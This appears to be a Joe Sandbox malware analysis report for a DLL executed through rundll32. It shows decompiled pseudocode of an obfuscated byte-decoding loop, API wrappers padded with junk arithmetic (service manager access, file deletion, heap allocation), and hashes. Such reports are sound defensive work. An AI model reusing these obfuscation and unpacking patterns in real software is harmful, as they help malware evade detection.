					 *(_t835 + 0x14) = (( *(_t826 - (_t385 * _t776 + 1) *  *0x1003611c + (_t385 * _t776 + 1) *  *0x1003611c * 2 - _t170 *  *0x10036120 - _t776 + _t776 * 2 + _t611 + 2) & 0x000000ff) +  *((char*)(_t833 *  *0x1003611c *  *0x10036110 + _t383 * _t776 - _t385 -  *0x10036120 + _t685 +  *((intOrPtr*)(_t835 + 0x20)) + _t826 + 2)) +  *(_t835 + 0x14)) % 0xf04;
					_t690 = _t562 *  *0x1003610c;
					 *(_t835 + 0x1c) = _t690;
					_t400 =  *0x1003610c; // 0x0
					_t697 =  *0x10036110; // 0x0
					_t563 =  *0x10036120; // 0x0
					 *(_t835 + 0x28) = (_t400 - _t562 - 2 + (_t400 - _t562 - 2) * 2 - (_t690 * _t776 + _t690 * _t776 * 2 -  *((intOrPtr*)(_t835 + 0x38)) +  *((intOrPtr*)(_t835 + 0x30)) +  *((intOrPtr*)(_t835 + 0x34)) + 5) *  *0x10036120) * _t562;
					 *((char*)(_t835 + 0x13)) =  *((intOrPtr*)(( *(_t835 + 0x18) + 3) * _t776 + _t826 + ( *(_t835 + 0x24) - _t563 - _t697) * 2 +  *(_t835 + 0x24) - _t563 - _t697 +  *(_t835 + 0x28) + _t611 + 2));
					_t203 = _t833 + 1; // 0x7fffffff
					_t414 =  *0x10036120; // 0x0
					_t415 =  *0x1003611c; // 0x0
					_t568 =  *0x10036110; // 0x0
					_t417 =  *0x10036110; // 0x0
					_t214 = _t833 + 2; // 0x80000000
					_t420 =  *0x10036120; // 0x0
					 *((char*)(_t420 + _t420 * 2 + ( *(_t835 + 0x18) + 0xfffffffd) * _t417 - _t214 *  *0x10036118 + _t826 + _t611 + 2)) =  *((intOrPtr*)(( *(_t835 + 0x1c) +  *(_t835 + 0x1c) - 2) * _t417 + (_t414 + _t414 - _t203 *  *0x1003610c + _t776 + _t776 + 2) * _t414 +  *(_t835 + 0x14) + ((_t568 - _t415 + 1) * _t776 +  *0x1003610c) * 2 + _t611));
					_t714 =  *0x10036118; // 0x0
					_t780 =  *0x10036110; // 0x0
					_t573 =  *0x1003611c; // 0x0
					_t715 =  *0x1003610c; // 0x0
					_t221 = _t833 + 3; // 0x80000001
					 *((char*)((_t573 - _t714 * _t780 - _t714 - _t780 + _t715 << 1) - _t221 *  *0x10036120 +  *(_t835 + 0x14) + _t611)) =  *((intOrPtr*)(_t835 + 0x13));
					_t718 =  *0x10036118; // 0x0
					_t427 =  *0x10036114; // 0x0
					_t782 = _t718 *  *0x1003610c;
					_t581 = _t427 + _t427 * 2;
					_t228 = _t833 + 2; // 0x80000000
					 *(_t835 + 0x24) = _t581;
					_t582 =  *0x1003610c; // 0x0
					asm("cdq");
					_t585 =  *0x1003611c; // 0x0
					 *(_t835 + 0x18) =  ~( *(_t835 + 0x24));
					 *(_t835 + 0x14) = ( *((char*)(_t833 *  *0x1003611c *  *0x10036110 + _t582 *  *0x10036114 -  *0x10036118 -  *0x10036120 + _t782 +  *((intOrPtr*)(_t835 + 0x20)) + _t826 + 3)) + ( *(1 - (_t718 * _t427 + 1) *  *0x1003611c + 2 - _t228 *  *0x10036120 - _t581 + _t826 + _t611) & 0x000000ff) +  *(_t835 + 0x14)) % 0xf04;
					_t730 = _t585 *  *0x1003610c;
					 *(_t835 + 0x1c) = _t730;
					_t448 =  *0x1003610c; // 0x0
					_t737 =  *0x10036120; // 0x0
					_t586 =  *0x10036110; // 0x0
					_t454 =  *0x10036114; // 0x0
					 *((char*)(_t835 + 0x13)) =  *((intOrPtr*)(( *(_t835 + 0x18) + 3) * _t454 + _t826 + (_t782 - _t737 - _t586 + 1) * 2 + _t782 - _t737 - _t586 + 1 + (_t448 - _t585 - 2 + (_t448 - _t585 - 2) * 2 - (_t730 *  *0x10036114 + _t730 *  *0x10036114 * 2 -  *((intOrPtr*)(_t835 + 0x38)) +  *((intOrPtr*)(_t835 + 0x30)) +  *((intOrPtr*)(_t835 + 0x34)) + 5) *  *0x10036120) * _t585 + _t611));
					_t257 = _t833 + 1; // 0x7fffffff
					_t743 =  *0x10036120; // 0x0
					_t260 = _t454 + 2; // 0x0
					_t744 =  *0x10036110; // 0x0
					 *(_t835 + 0x28) = ( *(_t835 + 0x1c) +  *(_t835 + 0x1c) - 2) * _t744 + (_t743 + _t743 - _t257 *  *0x1003610c + _t454 + _t260) * _t743 +  *(_t835 + 0x14) + ((_t744 -  *0x1003611c + 1) * _t454 +  *0x1003610c) * 2;
					_t269 = _t833 + 2; // 0x80000000
					_t461 =  *0x10036120; // 0x0
					_t271 = _t461 * 2; // 0x3
					 *((char*)(_t461 + _t271 + 3 + ( *(_t835 + 0x18) + 0xfffffffd) * _t744 - _t269 *  *0x10036118 + _t826 + _t611)) =  *((intOrPtr*)( *(_t835 + 0x28) + _t611));
					_t747 =  *0x10036118; // 0x0
					_t802 =  *0x10036110; // 0x0
					_t596 =  *0x1003611c; // 0x0
					_t803 =  *0x1003610c; // 0x0
					_t277 = _t833 + 3; // 0x80000001
					_t826 = _t826 + 4;
					 *((char*)((_t596 - _t747 * _t802 - _t747 - _t802 + _t803 << 1) - _t277 *  *0x10036120 +  *(_t835 + 0x14) + _t611)) =  *((intOrPtr*)(_t835 + 0x13));
					if(_t826 >= 0xf04) {
						break;
					}
					_t763 =  *0x10036114; // 0x0
				}
				return  *0x10038154( *((intOrPtr*)(_t835 + 0x20)));
			}

0x1000182a
0x10001836
0x10001839
0x1000183e
0x10001852
0x10001855
0x10001859
0x1000185f
0x10001865
0x10001876
0x10001886
0x10001898
0x1000189d
0x100018a1
0x100018b0
0x100018b2
0x100018c0
0x100018c3
0x100018c8
0x100018e1
0x100018ee
0x100018f2
0x10001900
0x10001918
0x10001943
0x10001958
0x1000196c
0x1000196f
0x1000198c
0x1000199f
0x100019a3
0x100018b0
0x100019ab
0x100019c0
0x100019c0
0x100019c6
0x100019cf
0x100019f6
0x10001a02
0x10001a19
0x10001a34
0x10001a3c
0x10001a47
0x10001a4f
0x10001a55
0x10001a5c
0x10001a7b
0x10001a8a
0x10001a93
0x10001a99
0x10001abf
0x10001ac2
0x10001acf
0x10001ae2
0x10001ae7
0x10001af3
0x10001b07
0x10001b1e
0x10001b2a
0x10001b39
0x10001b3c
0x10001b42
0x10001b48
0x10001b55
0x10001b6a
0x10001b78
0x10001b7b
0x10001b81
0x10001b86
0x10001b8f
0x10001ba8
0x10001bb8
0x10001bd6
0x10001bf2
0x10001bfa
0x10001c05
0x10001c0d
0x10001c13
0x10001c1a
0x10001c39
0x10001c4b
0x10001c51
0x10001c57
0x10001c7e
0x10001c82
0x10001c8e
0x10001c9e
0x10001cc3
0x10001cda
0x10001ce6
0x10001cf5
0x10001cf9
0x10001cff
0x10001d0a
0x10001d14
0x10001d27
0x10001d35
0x10001d38
0x10001d3e
0x10001d46
0x10001d4c
0x10001d65
0x10001d75
0x10001d93
0x10001daf
0x10001db7
0x10001dc2
0x10001dca
0x10001dd0
0x10001dd7
0x10001df6
0x10001e05
0x10001e0e
0x10001e14
0x10001e3b
0x10001e3f
0x10001e4b
0x10001e5e
0x10001e63
0x10001e81
0x10001e98
0x10001ea4
0x10001eb3
0x10001eb7
0x10001ebd
0x10001ec3
0x10001ed2
0x10001ee0
0x10001ef4
0x10001ef7
0x10001efd
0x10001f07
0x10001f16
0x10001f25
0x10001f39
0x10001f4d
0x10001f79
0x10001f81
0x10001f8d
0x10001f95
0x10001f9b
0x10001fa2
0x10001fc5
0x10001fd4
0x10001fdd
0x10001ff6
0x10002005
0x10002009
0x10002015
0x10002022
0x10002029
0x10002059
0x10002063
0x1000206f
0x10002076
0x10002083
0x10002086
0x1000208c
0x10002092
0x100020a7
0x100020ad
0x100020c3
0x100020cc
0x100020cf
0x00000000
0x00000000
0x100019af
0x100019af
0x100020ea

APIs

malloc.MSVCRT ref: 10001859

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 83826cf8f2dd2fc705ee911444c56d09f1b41b545cc014d5fa5f75ff0fe789ab
Instruction ID: ded538d838e012dfd32d1e1dc7960e9d1a7a211db7687b1b783404166f5b8784
Opcode Fuzzy Hash: 83826cf8f2dd2fc705ee911444c56d09f1b41b545cc014d5fa5f75ff0fe789ab
Instruction Fuzzy Hash: D652FA366042168FD705CF6CCEC2945BBE6FBDE204B09C629E5848F37BDA74E5098B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C37E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00C37E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00C332C4(_t33);
				_v28 = 0x38698;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0xf80068;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0x9c2a;
				_v12 = _v12 ^ 0xf804c3a3;
				_v8 = 0xd3ebc3;
				_v8 = _v8 << 0x10;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x000f62ee;
				_v16 = 0x690a65;
				_v16 = _v16 | 0xebc01c25;
				_v16 = _v16 ^ 0xebe7ec5f;
				E00C252F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
				_t40 = OpenSCManagerW(0, 0, _a20); // executed
				return _t40;
			}

0x00c37e1b
0x00c37e20
0x00c37e23
0x00c37e24
0x00c37e27
0x00c37e2a
0x00c37e2b
0x00c37e2c
0x00c37e31
0x00c37e3b
0x00c37e3e
0x00c37e41
0x00c37e48
0x00c37e4c
0x00c37e53
0x00c37e5a
0x00c37e61
0x00c37e65
0x00c37e7d
0x00c37e80
0x00c37e87
0x00c37e8e
0x00c37e95
0x00c37ea5
0x00c37eb2
0x00c37eb8

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C37EB2

Strings

_, xrefs: 00C37E95

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: _
API String ID: 1889721586-4005583852
Opcode ID: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction ID: 7b5903d2949daaadde8fc9f4bfa5af591c71867e43a914a87d7d4f29ce5a3aba
Opcode Fuzzy Hash: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction Fuzzy Hash: FE1133B1C01218FBDF01DF98D80A8CEBFB9EF04340F108089F815A2241D3B68B20EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C22CC4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00C22CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t35;
				void* _t42;
				void* _t45;

				_push(_a16);
				_t45 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00C332C4(_t35);
				_v20 = 0xfe94d;
				_v16 = 0xab1c4;
				_v16 = 0x50de48;
				_v16 = _v16 * 0x6c;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xc664fcf6;
				_v8 = 0xfaad6e;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0xffffd3fa;
				_v8 = _v8 ^ 0xf4e1ffa5;
				_v8 = _v8 ^ 0xa25eb8a6;
				_v12 = 0xe37a21;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xd10447cc;
				E00C252F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
				return _t42;
			}

0x00c22ccb
0x00c22cce
0x00c22cd0
0x00c22cd3
0x00c22cd6
0x00c22cd9
0x00c22cda
0x00c22cdb
0x00c22ce0
0x00c22cea
0x00c22cf1
0x00c22d0c
0x00c22d0f
0x00c22d13
0x00c22d1a
0x00c22d21
0x00c22d25
0x00c22d2c
0x00c22d33
0x00c22d3a
0x00c22d41
0x00c22d45
0x00c22d49
0x00c22d59
0x00c22d68
0x00c22d6e

APIs

RtlAllocateHeap.NTDLL(?,D10447CC,000FE94D), ref: 00C22D68

Strings

!z, xrefs: 00C22D3A

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: !z
API String ID: 1279760036-1244814218
Opcode ID: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction ID: 1e5be8a8c786e67cce812e8665217ecf3585d1261cd6eb6f383f9d9166e278d5
Opcode Fuzzy Hash: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction Fuzzy Hash: 4811DFB2C04208BBCB01EFE4D94A8DEBFB4EF45300F108488E92566252D3758B20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C358BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00C358BD(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t35;
				WCHAR* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__edx);
				_push(__ecx);
				E00C332C4(_t27);
				_v16 = 0x13586;
				_v16 = 0x4c59cc;
				_v16 = _v16 ^ 0xe50d706a;
				_v16 = _v16 ^ 0xe54f7d54;
				_v12 = 0x3bf9e4;
				_v12 = _v12 + 0x106;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x1c92743a;
				_v8 = 0x406212;
				_v8 = _v8 * 0x60;
				_v8 = _v8 + 0xffffd8c7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x000758b5;
				E00C252F2(__ecx, __edx, __ecx, 0x1f5, 0x7518e659, 0x9f49d153);
				_t35 = DeleteFileW(_t38); // executed
				return _t35;
			}

0x00c358c4
0x00c358c7
0x00c358c9
0x00c358ca
0x00c358cb
0x00c358d0
0x00c358da
0x00c358e1
0x00c358e8
0x00c358ef
0x00c358f6
0x00c35911
0x00c35914
0x00c3591b
0x00c35926
0x00c35929
0x00c35930
0x00c35934
0x00c35944
0x00c3594d
0x00c35953

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00C3594D

Strings

T}O, xrefs: 00C358E8

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: T}O
API String ID: 4033686569-2430299532
Opcode ID: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction ID: 51bc4b1224f9a703b1bf351b8b63523cabef0db9e573a4a1b0ec0a91648ad4a8
Opcode Fuzzy Hash: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction Fuzzy Hash: 3E013EB1D01208FBCB04EFA8D8469CEBFB4EB00318F20C199E404B7250E7B81B849F95

Uniqueness

Uniqueness Score: -1.00%

Function 100048A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E100048A0() {
				int _t1;

				_t1 =  *0x100381a0; // 0xb00020
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004080()))(); // executed
				return 0;
			}

0x100048a0
0x100048a7
0x100048aa
0x100048aa
0x100048b0
0x100048b5
0x100048be
0x100048c2

APIs

ExitProcess.KERNEL32 ref: 100048AA

Strings

DllRegisterServer, xrefs: 100048B0

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: ccc7c0eae74798fa411578d6a7fc94d054faac17a6a197938a0b76dede91f9e0
Instruction ID: 960098ebdd1f6929504dd613744f7588e9acc96a2f61373274c5c14cd7ddede6
Opcode Fuzzy Hash: ccc7c0eae74798fa411578d6a7fc94d054faac17a6a197938a0b76dede91f9e0
Instruction Fuzzy Hash: F3C04CF5A017519BF601EBB4AD89A4B22DCEB9028A7464868F500D2015EF34E5058765

Uniqueness

Uniqueness Score: -1.00%

Function 10013955 Relevance: 3.1, APIs: 2, Instructions: 59
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E10013955(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x1002e908);
				E10012CE0(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1003a33c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E10012D1B(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x1003b804 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x1003b800, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x1003b7f0; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10014CDE(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E10015536();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100139FF();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10012400(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10015832(_t31) != 0);
				goto L14;
			}

APIs

__lock.LIBCMT ref: 10013999
RtlAllocateHeap.NTDLL(00000008,?,1002E908,00000010,1001431B,00000001,0000008C,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000), ref: 100139D7

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap__lock
String ID:
API String ID: 4078605025-0
Opcode ID: 1efdde6269329017fd9cb6d282c05739c9870792f2908ad2ff079d595b1107f0
Instruction ID: 12de62318e65f95c4d9448aeaa1d0f6e4867f5423e76a248edee776cfd5b0317
Opcode Fuzzy Hash: 1efdde6269329017fd9cb6d282c05739c9870792f2908ad2ff079d595b1107f0
Instruction Fuzzy Hash: 1811043AC00A69AADB12DB648C4168D7BB5FF807A0F128206F9642F2D1CB34D8C18B95

Uniqueness

Uniqueness Score: -1.00%

Function 1001111B Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 18%

			E1001111B() {
				char _t9;
				intOrPtr _t12;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x1002e808);
				_t9 = E10012CE0(_t14, _t19, _t20);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x1003b804 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10014CDE(_t14, _t19, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10014D57(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10014D82();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001116E();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x1003b800); // executed
						}
					}
				}
				return E10012D1B(_t9);
			}

APIs

__lock.LIBCMT ref: 10011139

Part of subcall function 10014CDE: EnterCriticalSection.KERNEL32(?,?,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?), ref: 10014D06

RtlFreeHeap.NTDLL(00000000,?,1002E808,0000000C,10014CC2,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010), ref: 10011180

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterFreeHeapSection__lock
String ID:
API String ID: 3012239193-0
Opcode ID: c7da2b1efa687549a2cae6f7b89228f0afd3e79e7fc5b7caa793621a9dd5d032
Instruction ID: b8a8fd4867bae441b9044e63338476c2f5ed1107b97994fc0164613fed314693
Opcode Fuzzy Hash: c7da2b1efa687549a2cae6f7b89228f0afd3e79e7fc5b7caa793621a9dd5d032
Instruction Fuzzy Hash: 27F0B435842615BAEB29DB60DC06BDEBBB4EF003A5F214205F7146E0E1CF34E9C1CA90

Uniqueness

Uniqueness Score: -1.00%

Function 1001118C Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E1001118C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x1002e818);
				E10012CE0(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x1003b804 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x1003b804 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x1003b800, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x1003b7f0; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10014CDE(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E10015536();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E100111FE();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E10012D1B(_t9);
			}

APIs

__lock.LIBCMT ref: 100111AE

Part of subcall function 10014CDE: EnterCriticalSection.KERNEL32(?,?,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?), ref: 10014D06

RtlAllocateHeap.NTDLL(00000000,?,1002E818,0000000C,10011217,000000E0,10011242,?,10014C61,00000018,1002EB78,00000008,10014CF7,?,?), ref: 100111EF

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: 170503ab05a8c3c380249ea4d73da73123f21724a0634e09c26a9d4764d0f5f9
Instruction ID: 40c030b676b6377b818ff1b8a851e4bd1af64643cdb439750a8e94ae93b3a302
Opcode Fuzzy Hash: 170503ab05a8c3c380249ea4d73da73123f21724a0634e09c26a9d4764d0f5f9
Instruction Fuzzy Hash: 2BF0F635C41926BAEB15EBA49C057CDB7B0FF003A4F154114EB242F1E1CB30AD91CAD4

Uniqueness

Uniqueness Score: -1.00%

Function 10014ABB Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014ABB(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1003b800 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10014AA1();
					 *0x1003b804 = _t8;
					if(_t8 != 3 || E10014D0F(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x1003b800);
						goto L4;
					}
				}
			}

0x10014acc
0x10014ad4
0x10014ad9
0x10014b05
0x10014b07
0x10014adb
0x10014adb
0x10014ae3
0x10014ae8
0x10014b0b
0x10014af9
0x10014aff
0x00000000
0x10014aff
0x10014ae8

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,100117A5,00000001,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014ACC

Part of subcall function 10014D0F: HeapAlloc.KERNEL32(00000000,00000140,10014AF4,000003F8,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014D1C

HeapDestroy.KERNEL32(?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014AFF

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
